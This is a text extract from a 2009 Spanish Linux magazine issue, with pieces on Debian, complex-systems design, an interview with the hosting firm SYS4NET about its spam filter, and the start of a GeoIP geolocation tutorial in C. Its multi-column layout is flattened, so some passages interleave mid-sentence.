quetes de software muy modernos, lo cual
demuestra como creció en los últimos años
el número de desarrolladores (aunque mu-
chos digan que está en crisis por culpa de
Ubuntu).
No podemos decir que Debian sea mejor
que otro sistema operativo, está en cada em-
presa o en cada usuario ver qué es lo que más
les conviene usar.
La puerta ya está abierta, ahora cualquier
desarrollador que quiera unirse, puede hacer-
lo con toda seguridad, pues la comunidad
de desarrolladores de Debian cuenta con la
representación de Software in the Public
Interest, una organización sin ánimo de lucro
que da cobertura legal a varios proyectos de
software libre.
Aquellos que tengan curiosidad, pueden
descargar Debian desde su página Web usan-
do bittorrent (ahora es el método recomenda-
do), jigdo o HTTP. Pueden instalarla con toda
confianza, y estoy seguro que podrán apren-
der mucho con esta distribución de GNU/
Linux, pues además cuenta con mucha do-
cumentación y una excelente comunidad en
Internet.
Nota: Las imágenes del Logo pertenecen
a www.debian.org y están bajo una licencia
Creative Commons License.
En la red
• Página oficial del proyecto:
http://www.debian.org/
• Manifiesto de Debian
en español:
http://www.debian.org/doc/
manuals/project-history/
ap-manifesto.es.html
• Página con información útil sobre
Debian extremo:
http://www.debianrules.com.ar
• Página con información
en español sobre Debian:
http://www.esdebian.com
 software
Desarrollo de sistemas complejos

Desarrollo
de sistemas complejos
Lino García Morales
Sistemas complejos hace referencia a un, relativamente nuevo,
campo de la ciencia multidisciplinar que estudia cómo las partes
de un sistema dan lugar a comportamientos globales del sistema
en interacción con su entorno.

U
n ejemplo de un sistema complejo son los Capacidades
linux@software.com.pl

sistemas sociales, formados (en parte) de de los sistemas complejos

personas o el cerebro, formado por neuronas
o las moléculas, formadas por átomos o un PC
(Personal Computer) formado por hardware/software o una
aplicación TIC (Tecnologías de la Información y Comunica-
ciones) formadas por PCs, redes, datos, etc.
Los sistemas complejos contienen un gran número de
entidades autónomas y heterogéneas (las partes constituyen
bloques de construcción básicos: componentes, agentes,
procesos, etc.) en interacción. Cada elemento interactúa
con el resto, directa o indirectamente, y estas interacciones
afectan a otros elementos dando lugar a patrones de compor-
tamiento del sistema global, difíciles de deducir, ni inferir,
en función de la estructura y comportamiento de las partes
componentes.
En general el enfoque de los sistemas complejos es apro-
piado cuando la información del estado y comportamiento
del sistema es incompleta, existe incertidumbre y múltiples
propósitos, se desconocen las restricciones impuestas en
relación al sistema (controles, comportamiento, resultados
finales), su estructuración es débil, etc.
Las capacidades más importantes de los sistemas complejos
se presentan abajo.
Auto-organización
Autonomía del sistema para cambiar su comportamiento
y estructura en respuesta a eventos y cambios en el entor-
no que le afecten. Se puede producir un orden no-trivial,
gran-escala, con procesos e interacciones simples. La co-
evolución está relacionada con la capacidad de adaptación
a la nueva interacción con el entorno que supone tal cambio
(la evolución impone un incremento continuo de su propia
complejidad).
Emergencia
Propiedad que surge de la interacción de los elementos
constitutivos de un sistema complejo. Las propiedades emer-
gentes no existen en los componentes y, debido a que surgen
de las interacciones imprevisibles de los componentes, no
se pueden planear o diseñar. Está relacionado con la de-
pendencia del todo con las partes, y con la interdependencia

32 Linux+ 4/2009

y especialización de las partes. Se puede de-
mostrar la naturaleza de los sistemas complejos
investigando cómo afectan los cambios de una
parte al resto y al comportamiento del todo. La
aparición del orden gran-escala es un proceso
general (y opuesto) al incremento de la entropía
mientras que la formación de patrones es una
parte integral de la funcionalidad de la mayoría
de los sistemas complejos.
Anticipación
Habilidad del sistema complejo de predecir
cambios en el entorno, hacerle frente y ajustar
su comportamiento en consecuencia. La antici-
pación prepara al sistema ante cambios antes de
que ocurran y le ayuda a adaptarse en ausencia
de perturbaciones.
Robustez
Habilidad del sistema para mantener sus fun-
ciones ante perturbaciones. Esta habilidad está
relacionada con la adaptación y estabilidad del
sistema. Los sistemas complejos son, por defi-
nición, no-determinísticos (exhiben un com-
portamiento impredecible; incluso caótico bajo
ciertas condiciones). La robustez posibilita la
adaptación del sistema.
Sistemas TIC complejos
Las aplicaciones basadas en TIC son un con-
junto de servicios, redes, software y disposi-
tivos que tienen como objetivo la mejora de
la calidad de vida de las personas dentro de
un entorno, y que se integran a un sistema
de información interconectado y complemen-
tario.
Figura 1. Página oficial del proyecto Ardabasto
Estas aplicaciones coexisten en un entor-
no tecnológico plural, dinámico, compuesto
por un gran número de partes que interactúan
entre sí, impredecible y en constante evolu-
ción. Internet, por ejemplo, se consolida como
entorno de convergencia de la mayoría de las
aplicaciones TIC. A diferencia de, tan sólo una
década atrás, la mayoría de las aplicaciones
ingeniería no sólo producen sistemas prede-
cibles, estables, controlables, precisos, trans-
parentes, eficientes y confiables que satisfa-
cen determinadas restricciones, estándares de
prestaciones pre-especificados, en situaciones
pre-especificadas, sino que interactúan con ot-
ros muchos sistemas geográficamente distri-
buidos, autónomos, independientes, tecnoló-
gica y funcionalmente diferentes, dando lugar
a sistemas complejos escalables, flexibles, evo-
lutivos, adaptables, elásticos, robustos, perdu-
rables, seguros, auto-monitorizables y auto-
reparables; más útil, cuanto más rico en com-
portamientos (éste es el paradigma fundamen-
tal de los sistemas complejos; en entornos
ricos en problemas, un sistema complejo, con
un repertorio rico en comportamientos, tiene
mayor capacidad de descubrir una variedad de
soluciones potenciales).
La desagregación, desde el punto de vista
de los sistemas complejos, es una pieza clave
para un buen diseño y permite enfocar cuida-
dosamente el diseño del sistema en término de
sus partes o componentes e interacciones entre
sí (incluso a diferentes niveles, con diferentes
equipos de trabajo en cada nivel. El nivel de
diseño se define en términos de nivel de deta-
lle). Aunque clásicamente éste es un proceso
www.lpmagazine.org
software
Desarrollo de sistemas complejos
Figura 2. La pila OSI
arriba-abajo (top-down), que se mueve lógica-
mente desde la funcionalidad deseada hacia un
diseño que implemente tal funcionalidad, en el
contexto de los sistemas complejos se aplican
más procesos del tipo abajo-arriba (down-top)
que buscan cómo implementar la funcionalidad
deseada con la base de diseños disponibles
o, más apropiado aún, aprovechando la propie-
dad de auto-organización de los sistemas com-
plejos de adaptarse a nuevos comportamientos
de forma autónoma.
Componentes
El componente de un sistema TIC por excelen-
cia es el ordenador o computadora; es autóno-
mo, tiene un número ilimitado de funciones, es
heterogéneo, y susceptible de aportar, como
parte, las funcionalidades de un sistema com-
plejo: auto-organización, emergencia, anti-
cipación y robustez. De hecho un PC es en
sí mismo un sistema complejo, formado por
partes que son, a su vez, sistemas complejos
(los microprocesadores, por ejemplo, con sus
millones de componentes electrónicos son
sistemas extremadamente complicados pero,
gracias que ha sido cuidadosamente diseñado
y probado, es posible, simplemente, asumir
que funciona), lo que permite crear sistemas
de gran-escala y alto-orden.
Es posible desagregar la complejidad de
un PC, en un primer nivel, en dos componen-
tes funcionales: hardware y software. El hard-
ware constituye el substrato físico que soporta
al software; abarca todas las piezas físicas de
un ordenador (CPU, placa base, cables, etc.)
mientras que el software hace referencia
a los programas y datos almacenados en un
33
 software
Desarrollo de sistemas complejos
ordenador (los programas dan instrucciones
para realizar tareas al hardware o sirven de
conexión con otro software mientras que los
datos solamente existen para su uso eventual
por los programas). Estas definiciones podrían
llevar a relacionar ambos términos (teniendo
en cuenta que provienen de duro y suave) con
mayor/menor flexibilidad o rigidez. Sin embar-
go, aunque efectivamente existe cierta relación,
es un poco engañosa.
El hardware es más rígido, o poco
flexible, con menor capacidad de auto-or-
ganización que el software. Se diseña para
satisfacer determinadas funciones y reque-
rimientos. Una alteración, para adecuarse
a nuevas situaciones, podría requerir de
cambio de componentes electrónicos y/o in-
terconexiones entre ellos, placas, etc. o una
reprogramación (existen componentes elec-
trónicos que permiten re-programar sus fun-
ciones). Todo depende de la generalidad
o universalidad de su diseño. El PC, por
ejemplo, posee el hardware (mínimo) que le
permite adaptarse, mediante software, a un
elevadísimo número de posibilidades. La CPU
(Control Process Unit) es un sofisticado
sistema complejo hardware con capacidad
de auto-organización vía software mientras
que el ratón es un sistema hardware a me-
dida que sólo es capaz de realizar determi-
nadas funciones básicas. El software es más
flexible, o poco rígido, pero, su alcance, está
determinado y condicionado por el soporte
hardware. El mecanismo para solucionar
estas limitaciones es la expansión. Los PCs
tienen ranuras (slots) de expansión para
añadir funcionalidad hardware, o mediante
puertos de interconexión universal, y, los
programas, mecanismos enchufables (plu-
gins) para comunicarse entre sí (proporcio-
nado normalmente por un nivel de soporte
adicional: el sistema operativo).
Así que, en el desarrollo de sistemas
complejos, una decisión muy importante a to-
mar es qué implementar por hardware y qué
por software. O, visto de otra manera, qué
conceptos pueden ayudar a tomar la mejor
decisión. Empezando por esto último, algu-
nos de los criterios más relevantes a consi-
derar se enumeran abajo.
Velocidad
El límite de proceso de una CPU está deter-
minado por su reloj. Si se requiere mayor ve-
locidad es necesario recurrir a hardware con
determinado grado de especialización (DSP,
Digital Signal Processor; FPGA, Field Pro-
grammable Gate Array; ASIC, Application-
Specific Integrate Circuit).
34
Sobre el autor
Graduado de Ingeniería en Control Automático, Máster en Sistemas y Redes de Co-
municaciones y Doctor por la Universidad Politécnica de Madrid. Ha sido profesor en
Instituto Superior de Arte, Universidad Pontifici.a Comillas y la Universidad Meléndez
Pelayo.
Actualmente Profesor de la Escuela Superior Politécnica de la Universidad Europea
de Madrid y Director del Máster Oficial en Acústica Arquitectónica y Medioambiental. Li-
dera grupo de investigación transdisciplinar en la intersección Arte, Ciencia, Tecnología
y Sociedad. Becas por la Agencia Española de Cooperación Internacional, FUNDESCO,
Consejo Superior de Investigaciones Científicas y Universidad Politécnica de Madrid.
Además ha formado parte de las bandas Cartón Tabla y Música d’ Repuesto. Dis-
cografía: Las palabras vuelven, Se fue, Bags, Flags, Faqs, Fotos d’ parque, These little
things that keep inside, Mr. Fro (colaboración con Alejandro Frómeta), El eje del mal, Av
abuc, Variaciones en la cuerda VOL. I.
Y ha publicado una novela: Islas.
lino@madrid.com
Volumen cional de montaje, es menos mantenible (da-
El hardware ocupa un lugar en el espacio da su naturaleza dura; aunque es necesario
a diferencia del software; que utiliza el pro- hacer una distinción entre hardware estático
pio hardware como estrato o soporte. Los y reconfigurable. El hardware estático corres-
convertidores analógico-digital sigma-delta, ponde al conjunto de elementos materiales de
por ejemplo, utilizan técnicas de sobremues- los sistemas electrónicos mientras que el re-
treo para simplificar el hardware al mínimo configurable se describe mediante un lenguaje
(filtro analógico malo de muy bajo orden), de descripción [HDL, Hardware Description
mientras que trasladan la mayor complejidad Language] que permite especificar con todo
al software (filtro digital preciso de muy alto detalle su estructura y funcionalidad), etc. Pro-
orden). bablemente un buen criterio de trabajo pasa
por minimizar el desarrollo de hardware al mí-
Prestaciones nimo y garantizar un desarrollo y adaptación
El PC tiene un mínimo de prestaciones de se- vía software.
rie y algún mecanismo de expansión para su Algunos criterios como velocidad, pres-
ampliación (SCSI, Small Computers System taciones y volumen, los impondrá la propia
Interface; PCI, Peripheral Component Inter- aplicación mientras que el resto, indepen-
connect; S-ATA, Serial Advanced Technolo- dencia y coste, son más objetivo de diseño
gy Attachment; E-IDE, Enhanced Integrated (el coste, por ejemplo, suele ser un punto de
Drive Electronics; USB, Universal Serial partida habitual); aunque todos estos criterios
Bus; FireWire, i.Link ó IEEE 1394). Cuando están directa o indirectamente relacionados.
se requiere de alguna funcionalidad no inte-
grada es necesario acoplarla mediante alguno Interacciones
de estos mecanismos estándar. No menos importante, a medias entre hard-
ware y software, son las comunicaciones.
Independencia Los sistemas, en general, pueden ser hard-
Los dispositivos interactúan, ya sea directa- ware, software o mixtos y esto supone dife-
mente vía hardware o a través de señales de rentes mecanismos de comunicación entre
mayor nivel de abstracción, el dato. La inde- ellos. La comunicación y sincronización en-
pendencia está relacionada con la capacidad tre procesos (IPC, Interprocess Communi-
de autonomía de un sistema: tanto respecto al cation) se realiza mediante un buen número
hardware en sí como al software. El uso de de plataformas estándares (tuberías [pipes]
estándares y la distribución funcional ayudan anónimas y con nombre; CORBA, Com-
a conseguir mayor independencia. Es mucho mon Object Request Broker Architecture;
más versátil un sistema independiente de sis- DCE, Distributed Computing Environment;
temas operativos, versiones y tecnologías. MBUS, Message Bus [especificado en RFC
3259]; RPC, Remote Procedure Calls; RMI,
Coste Remote Method Invocation; Sockets; XML,
El desarrollo hardware es, en general, más Extensible Markup Language; XML-RPC;
caro; requiere de instrumentación, coste adi- SOAP, Simple Object Access Protocol), que
Linux+ 4/2009

siguen el modelo OSI (Open System Inter-
connection) de la ISO (International Stan-
dard Organization), a mayor o menor nivel,
o propietarios.
En sistemas autónomos (hardware o mix-
tos) la conexión termina en algún estándar de
nivel físico (USB, RS-232, RS-485, Ethernet,
etc.) que transforma los datos (información) en
señales, y garantiza el intercambio de informa-
ción; mientras que los sistemas software utili-
zan mecanismos de comunicación normalmen-
te soportados por el sistema operativo o APIs
(Application Programming Interface); que son
un conjunto de funciones y procedimientos
(o métodos si se refiere a programación orien-
tada a objetos) que ofrece cierta biblioteca para
ser utilizado por otro software como una capa
de abstracción.
En cualquier caso, es deseable que la
comunicación física entre los procesos sea
independiente de la topología de intercone-
xión (punto a punto, árbol, anillo, bus, ma-
lla, etc.) y que, tal interacción, se produzca
a nivel de aplicación. Para ello, pueden
intervenir una enorme cantidad de sub-
sistemas de comunicación que aumenta la
complejidad del sistema global a nivel de
comportamiento.
La conexión por excelencia por sistemas
o dispositivos TIC ha sido durante muchos
años el RS-232C (Electronic Industries
Alliance). Aunque es una norma de interfaz
diseñada, inicialmente, para el intercambio
serie de datos binarios entre un DTE (Data
Terminal Equipment) y un DCE (Data Com-
munication Equipment), permite conexión
DTE-DTE. Prácticamente cualquier disposi-
tivo con alguna pretensión de independencia
incorporaba RS-232C de serie. Sin embargo,
fundamentalmente dada la limitación de su
velocidad (no más de 20 Kb/s), con el tiem-
po ha sido sustituido por el USB (1.0, hasta
1'5 Mbps [192 KB/s], utilizado en su mayor
parte por dispositivos de interfaz humana,
como los teclados, los ratones y los joys-
ticks; 1.1, hasta 12 Mbps [1'5 MB/s], estos
dispositivos dividen el ancho de banda de la
conexión USB entre ellos, basados en un al-
goritmo de búferes FIFO [First In First Out];
2.0, hasta 480 Mbps [60 MB/s]; 3.0, aún en
fase experimental y con tasa de transferencia
de hasta 4.8 Gbps [600 MB/s]). Observe que
cualquier PC incorpora varios puertos USB
y ninguno RS-232C. Sin embargo, cualquier
puerto de comunicación serie asíncrono no
implementa la capa física del modelo OSI
(utiliza señalización TTL [Transistor-Tran-
sistor Logic] o CMOS [Complementary Me-
tal Oxide Semiconductor]) lo que facilita la
software
Desarrollo de sistemas complejos
integración del hardware, a muy bajo nivel,
con protocolos de comunicación estándar
(se trata sólo de un cambio en la capa de más
bajo nivel encargada de la señalización).
Se puede conseguir el mayor grado de
independencia desagregando funcionalmente
al sistema en múltiples componentes y nor-
malizando los protocolos de comunicación
e interacción, al más alto nivel de abstracción:
el nivel de aplicación del modelo OSI.
Conclusiones
El mundo es complejo. El esfuerzo por crear
sistemas análogos a los naturales pasa por
la comprensión de su complejidad y por la
desagregación del sistema complejo en múl-
tiples partes. Este enfoque converge hacia la
paralelización, multiproceso, y al aumento de
la complejidad global, en general, a cambio
de ofrecer la posibilidad de uso de técnicas
tradicionales de diseño y desarrollo para
los componentes, aumento de la fiabilidad,
facilidad de mantenimiento y desarrollo,
modularidad, escalabilidad, etc.
El abaratamiento de tecnologías de muy
bajo nivel (microcontroladores), en parale-
lo al aumento de su potencia de cómputo
e interacción, facilita la creación de sistemas
complejos cada vez más autónomos, des-
centralizados e independientes. Ardabasto
(Linux+No. 46, pp: 82-85) es un ejemplo de
ello: abstrae la complejidad del hardware con
un lenguaje de medio/alto nivel, y posee co-
municación USB e I2C (Inter-Integrated Cir-
cuit) de serie; fácilmente expandible, vía co-
municación serie asíncrona a cualquier otro
estándar de comunicación (inalámbrico, por
ejemplo, como WiFi [norma IEEE 802.11],
o Bluetooth [especificación industrial para Re-
des Inalámbricas de Área Personal, WPANs,
para transmisión de voz y datos]). La clave
está en dotarlo de una interfaz o lenguaje es-
tándar que permita la interacción (basado en
XML, por ejemplo).
Los sistemas, cuanto más independien-
tes, son más susceptibles de adaptarse a los
cambios, incluso, de la propia tecnología
como entorno, de evolucionar coherentemen-
te, de reutilizar, de entender y mantener; en
definitiva, de sobrevivir. Los sistemas com-
plejos, aunque relativamente nuevos, son una
paso conceptual más allá del ancestral divide
y vencerás que aporta el cómo para entender
sistemas (análisis) en la unión está la fuerza
para generar sistemas (síntesis) en sintonía
con el mundo que nos rodea, incierto, no li-
neal y caótico, por naturaleza. De eso se trata,
de un ir y venir en espiral que converge en lo
desconocido.
www.lpmagazine.org 35
 entrevista
Entrevista a SYS4NET
SYS4NET:
Hosting de calidad máxima
SYS4NET es una compañía dedicada a los servicios de alojamiento web y registro
de dominios, con infraestructura propia en España, en la que aloja más de 20.000
páginas web.
LiNUX+: ¿Cómo nació la empresa?
SYS4NET: La empresa Grupo SYS4NET
nace a mediados de 2002, como solución a la
creciente demanda de alojamiento web e in-
fraestructura de calidad para albergar distintos
proyectos en la red.
Nuestros principales objetivos han sido
proporcionar un servicio de calidad, a un precio
competitivo, basándonos en la última tecnolo-
gía, y siguiendo una innovación constante, lo
cual nos permite un tiempo de respuesta exce-
lente ante cualquier tipo de eventualidad.
Con una continua inversión en equipa-
miento e infraestructura, tanto física como de
red, hemos conseguido alcanzar un tiempo en
línea superior al 99,9 %. Esto nos sitúa como
una empresa de referencia para proyectos con
necesidades especificas de alta disponibilidad
y rendimiento, que necesiten estar respaldadas
por un equipo de profesionales.
SYS4NET destaca por su trato cercano con
sus clientes, comprendiendo la condición única
de cada uno de ellos, y ofreciendo soluciones
adaptadas a sus necesidades.
LiNUX+: ¿Cómo se desarrollo?
SYS4NET: SYS4NET inició su actividad
confiando en la profesionalidad y experiencia
de la infraestructura y sistemas estadounide-
36
nses, ya que en 2002 la conectividad y los cen-
tros de datos europeos aun no estaban comple-
tamente desarrollados.
Más adelante, y por la propia evolución
del sector, la latencia se convertía en parte
importante del servicio. Por esta razón, en
el año 2005, SYS4NET decidió realizar una
gran inversión en equipamiento e infraestruc-
tura para colocar sus servidores en París, junto
a un punto neutro de interconexión. Con este
cambio se consiguió reducir la latencia hacia
los servidores, y ofrecer un mejor servicio a los
clientes albergados, sin incrementar el coste de
los planes.
En el año 2007, internet en España había
evolucionado notablemente desde los inicios de
SYS4NET, y se convirtió en el objetivo para la
consolidación de la empresa.
Una nueva inversión en infraestructura
y equipamiento nos permitió reubicar todos
nuestros sistemas en un nuevo centro de da-
tos, situado en Valencia. Este cambio redujo,
nuevamente, la latencia hasta los servidores,
y permitió un aumento de velocidad para todos
los clientes.
Del mismo modo, por la proximidad geo-
gráfica entre nuestras oficinas centrales y las
instalaciones del centro de datos, conseguimos
Linux+ 4/2009
reducir los tiempos de actuación, avanzando
hacia el objetivo de conseguir un tiempo en
linea del 100 %.
LiNUX+: ¿Nos podéis presentar algunos
casos de éxito?
SYS4NET: Entre todos nuestros clientes,
podemos destacar sin duda casos de éxito
a nivel mundial, como BuscandoCasa.com,
el portal inmobiliario más grande de Uruguay.
Gracias a la experiencia adquirida en los
más de 7 años de trabajo, SYS4NET se encon-
traba en condiciones de analizar y apoyar un
proyecto de gran envergadura.
Se planteó la necesidad de crear un sistema
estable, pero a la vez flexible, que cubriera unas
necesidades muy concretas, como disponibili-
dad: (la mayor parte de proyectos en internet,
BuscandoCasa.com, requería una garantía de
disponibilidad del 100 %), volumen de carga
(por las características propias del proyecto, se
tuvo que planificar e instalar una infraestruc-
tura preparada para soportar mayor volumen
durante ciertas épocas del año (alquileres en
verano, etc.), pero que a la vez debía ser eco-
nómicamente viable el resto del año, donde el
volumen de carga disminuye), escalabilidad
(del mismo modo, en la planificación del
proyecto, se tuvieron que tener en cuenta las

posibilidades de ampliación, de manera que
se garantizara un crecimiento sin limitaciones
para BuscandoCasa.com, ampliando la infra-
estructura según los nuevos requisitos, pero sin
afectar al equipamiento ya alojado).
Gracias a una planificación y servicio efi-
ciente, BuscandoCasa.com continua creciendo,
consolidándose, cada vez más, como el portal
inmobiliario más importante de Uruguay.
LiNUX+: ¿Qué servicios ofrecen?
SYS4NET: En SYS4NET ofrecemos
alojamiento web en cualquiera de sus varian-
tes, desde lo más básico a nivel usuario parti-
cular, hasta soluciones de computación distri-
buida para grandes corporaciones. Contamos
con distintos planes y servicios, que cubren
las necesidades de la mayoría de nuestros
clientes.
Registro de dominios: Hoy día, para todas
las empresas, es imprescindible contar con su
marca registrada en internet. Desde SYS4NET
ofrecemos el servicio de registro de dominios,
para las extensiones más comunes (COM,
NET, ORG, INFO, ES), ofreciendo un panel
de control por cada dominio, donde el clien-
te puede modificar cualquier valor (datos de
contacto, DNS) y configurar redirecciones web
y de correo, siguiendo la máxima de ofrecer al
usuario la posibilidad de gestión completa de
sus servicios contratados.
Alojamiento web: Dentro de los servicios
de alojamiento web compartido, podemos eng-
lobar al 80 % de los usuarios, con necesidades
básicas para colocar su página en internet. Des-
de SYS4NET ofrecemos planes de alojamiento
sobre las dos plataformas más extendidas: Win-
dows y Linux. De este modo siempre podemos
garantizar un servicio independientemente de
cual sea el lenguaje de programación emplea-
do: PHP, ASP...
Planes para revendedor: Facilitamos la
entrada al mercado a nuevos emprendedores
dispuestos a comenzar su negocio, con un mí-
nimo de inversión. Los 7 años de experiencia
en el sector, nos avalan como garantía de un
servicio estable y eficaz. Los revendedores se
benefician de un soporte técnico y comercial
preferente, para despejar cualquier tipo de
duda.
Servidores VPS: Por nuestro compromiso
de ofrecer la última tecnología a nuestros
clientes, recientemente hemos incorporado
el servicio de Servidores Privados Virtuales,
que permite contar con un sistema operativo
(Windows o Linux) virtualizado sobre una
plataforma ESXi, reduciendo los costes de
implementación y ofreciendo al cliente un
sistema completamente exclusivo para él a un
precio reducido.
Servidores dedicados: Para proyectos pro-
fesionales, que requieren una solución exclu-
siva, orientada de una manera específica. Los
servidores dedicados ofrecen libertad al usuario
para instalar sus propias aplicaciones e integrar
sus propios sistemas.
LiNUX+: ¿Qué es SendGuardian.com?
SYS4NET: ¿Como sería un mundo sin
Spam, Virus y Phising? Estamos un poco
más cerca. Recientemente hemos lanzado el
servicio definitivo de protección para correo
electrónico.
SendGuardian.com se sitúa entre internet
y el servidor de correo del usuario, actuando
como barrera que detiene el 99 % de correo
no deseado, virus y phising que llegan
al usuario. A diferencia de otros servicios,
SendGuardian.com no requiere instalación
de software extra en el servidor de correo
o en el equipo personal del usuario, lo que
facilita una rápida y sencilla configuración,
sin necesidad de modificar cuentas de correo
o contraseñas.
Para comenzar a utilizar SendGuardian.com,
solo hay que modificar el registro MX del do-
minio. Al ser una barrera colocada entre internet
y el servidor de correo final, SendGuardian.com
funciona sobre cualquier servidor de correo,
independientemente de la plataforma, sistema
operativo, o ubicación. SendGuardian.com uti-
liza hasta 10 comprobaciones para detectar correo
no deseado, virus y phising:
• Listas blancas: Para que no se pierda nin-
gún mensaje, SendGuardian.com no filtra
a los remitentes que considera seguros.
• Listas grises: Porque los spammers no
suelen intentar el envío del mismo mensa-
je dos veces, SendGuardian.com lo aplaza
en el primer intento, y solo lo procesa si se
produce un segundo intento de entrega.
• Validación de HELO: En el protocolo de
los servidores de correo, HELO es la forma
que tienen los sistemas para saludarse, al
iniciar una conexión. Este HELO contiene
el nombre de host del servidor que intenta
entregar el mensaje. SendGuardian.com re-
chaza mensajes que provengan de IPs diná-
micas, o proveedores de ADLS, cable para
hogar, etc.
• Validación de remitente: SendGuardian.
com comprueba si la dirección de correo
que intenta entregar el mensaje realmente
existe.
• Bloqueo de IPs: SendGuardian.com blo-
quea las IPs que, en las últimas horas,
han generado más de un 50 % de correo
no deseado, contaminado con virus o phi-
sing.
www.lpmagazine.org
entrevista
Entrevista a SYS4NET
• Registro SPF: SendGuardian.com comprue-
ba si el mensaje proviene del servidor de
correo indicado por el registro SPF del
dominio, para evitar la suplantación de
dominios.
• Listas DNSBL: SendGuardian.com utiliza
más de 20 listas internacionales de bloqueo
de spam. Puntua los mensajes según la
posibilidad de que sean correo no deseado,
dependiendo de la información facilitada
por las listas DNSBL.
• Comprobación URIBL: Recientemente, los
spammers, han comenzado a codificar los
mensajes con el código URI, para evitar
ser detectados por los servicios antispam.
SendGuardian.com descifra y comprueba
esta codificación, para bloquear cualquier
mensaje de correo no deseado.
• Bloqueo de adjuntos: SendGuardian.com,
a través de un servicio antivirus, verifica
los adjuntos de todos los mensajes de co-
rreo, en busca de virus.
• Filtros bayesianos: A través de un diccio-
nario de palabras, generalmente contenidas
en correo no deseado, SendGuardian.com
valora y puntúa cada mensaje de correo,
según la probabilidad de que se trate de un
mensaje de correo no deseado.
Uniendo todas las comprobaciones, y en re-
lación a la puntuación de cada chequeo, Send-
Guardian.com construye una identificación ex-
clusiva para cada mensaje, y decide si se trata
de un mensaje legítimo, o de correo no deseado,
acertando en más del 99 % de los mensajes.
LiNUX+: ¿Cuáles son las ventajas para
los clientes de su empresa?
SYS4NET: SYS4NET tiene sus equipos
alojados en uno de los mejores centros de datos
a nivel nacional, que cumple con la normativa
TIER IV, lo que garantiza unas condiciones
óptimas de seguridad, conectividad y calidad
eléctrica.
El centro de datos se encuentra custodiado
las 24 horas del día, los 365 días del año, por
personal de seguridad y control de accesos. Del
mismo modo, existe personal técnico perma-
nente en el centro de datos, para poder realizar
cualquier actuación física necesaria sobre los
servidores, y encargados de la monitorización
continua de todos los sistemas. Gracias a esto,
somos capaces de detectar cualquier problema
en los siguientes dos minutos a su aparición,
y activar el protocolo de resolución asociado.
Todo lo expuesto hace de SYS4NET una
opción segura y estable para cualquiera de sus
proyectos.
LiNUX+: Muchas gracias por esta peque-
ña entrevista.
37
 hacking para linuxeros
Geolocalización IP

Geolocalización IP
David Puente Castro
Localizar una IP a lo largo del globo terráqueo para saber en
que país, ciudad, región, latitud o longitud se encuentra alguien
con el que chateamos y desconocemos su paradero, no pasa de
ser un mero juguete que puede resultar divertido. Pero cuando
se implementa dentro del código de nuestro propio traceroute,
entonces se convierte en un arma mucho más poderosa.

G
eoIP básicamente esta compuesto de dos
linux@software.com.pl

elementos: una librería y una base de da-

En este artículo aprenderá
tos. En realidad, GeoIP es un software de
pago de la empresa MaxMind. Por suerte • El funcionamiento básico de GeoIP,
para nosotros ofrecen al mismo tiempo una versión libre • Un motor básico de traceroute (Este motor ha sido ex-
denominada GeoLite City cuya única diferencia es la co- traído de un programa creado por mi y por lo tanto se
bertura que alcanza. En la Tabla 1 verán las estadísticas expone aquí para que lo adapten a sus necesidades),
oficiales. • Exportar coordenadas a GoogleEarth.
En resumen nos dice que la base de datos libre cubre:
• C,
• Países: 99.3 %, • PHP (Pure),
• Ciudades: 76 %. • Java,
• Perl (XS),
Y la de pago: • Perl (Pure),
• Python,
• Países: 99,8%, • MS COM,
• Ciudades: 81 %. • C#,
• Pascal,
Aunque la diferencia puede parecer significativa en el caso de • Ruby.
las ciudades, para nuestro objetivo sera más que suficiente.
GeoIP está disponible como código abierto para los Como aquí nos centraremos en el primero de los lenguajes,
siguientes lenguajes: puede descargar los fuentes directamente desde esta direc-

38 Linux+ 4/2009
 hacking para linuxeros
Geolocalización IP

• char *country_name: País,

• char *city: Ciudad,
• float latitude: Latitud,
• float longitude: Longitud.

Podrían interesarle otros campos, como:

Figura 1. Logo de MaxMind • char *country_code

• char *country_code3
ción: http://www.maxmind.com/download/geoip/ Una opción adicional, como se puede observar • char *region
api/c/GeoIP.tar.gz es -lGeoIP, cuyo parámetro se encarga de car- • char *postal_code
Y la base de datos, que deberá instalar en gar la librería indicada por el nombre adjunto. • int dma_code
el directorio /usr/local/share/GeoIP/ de Esto tal vez pueda resultar extraño al más no- • int area_code
su distribución Linux, debería estar esperan- vato. Las convenciones POSIX indican que un • int charset
dole aquí: http://www.maxmind.com/download/ argumento de opción debe ir separado de este • char *continent_code
geoip/database/GeoLiteCity.dat.gz mediante un espacio, algo como -l GeoIP sien-
do -l la opción de cargar librerías. No obstante, Definiremos una variable global GeoIP para
Programar con GeoIP el estándar permite la práctica histórica de colo- poder acceder a la base de datos desde cual-
Si su objetivo es conocer todas las funciones car tanto opción como argumento, juntos en la quier función:
que puede proporcionarle esta librería, solo tie- misma cadena.
ne que hacer una cosa muy sencilla: leerse los GeoIP *gi;
archivos de cabecera. Todas ellas tienen nom- El código
bres intuitivos, sus parámetros son evidentes GeoIP nos proporciona 2 estructuras básicas Antes de empezar, todavía me gustaría hacer
y los valores que devuelven suelen almacenarse con las que interactuaremos en nuestro progra- algo interesante y necesario: crear una estruc-
en estructuras bien definidas. Aquí solo vere- ma. Estas son: tura global que contenga la información de
mos la siguiente función: un host (ordenador) y una variable que lleve
• struct GeoIPTag –> typedef: GeoIP la cuenta de cuantos hosts llevamos localiza-
GeoIPRecord * GeoIP_record_by_ • struct GeoIPRecordTag –> ypedef: dos y almacenados. Será util en posteriores
name(GeoIP *, const char *); GeoIPRecord secciones, cuando empiecen a encajar las
piezas (Listado 1).
Las estructuras que observa se explicarán den- Puede consultar los archivos de cabecera para Veremos ahora cómo podemos abrir
tro de poco. Vulgarmente podríamos decir que conocer todos y cada uno de sus campos. Aquí nuestra base de datos. Introduciremos la
el primer argumento es una base de datos abier- solo mostraremos los más interesantes. sentencia en una función aparte. ¿Por qué?
ta donde buscar toda la información del HOST/ En la primera de las estructuras guardare- Simple, si este código formara parte de un
IP definido en el segundo. La función devuelve mos el resultado de la apertura de la base de programa mayor y necesitásemos realizar
una estructura con toda la información que po- datos para poder consultarla a partir de ese mo- sucesivas búsquedas, no resultaría nada
damos necesitar acerca de su localización, o un mento tantas veces como queramos. La segun- aconsejable reabrir la misma base de datos
valor NULL en caso fallido. da es un registro en el que se guardan los datos continuamente.
Al fin y al cabo, todas las demás funciones de una IP localizada. A nosotros nos interesaran El primer argumento cae de cajón, el se-
devuelven diferentes valores según sus argu- los siguientes que son más que intuitivos: gundo no tanto, pero la explicación no tardará.
mentos. Algunas de ellas se encargan de devol-
Tabla 1. La diferencia entre GeoIP y GeoLite
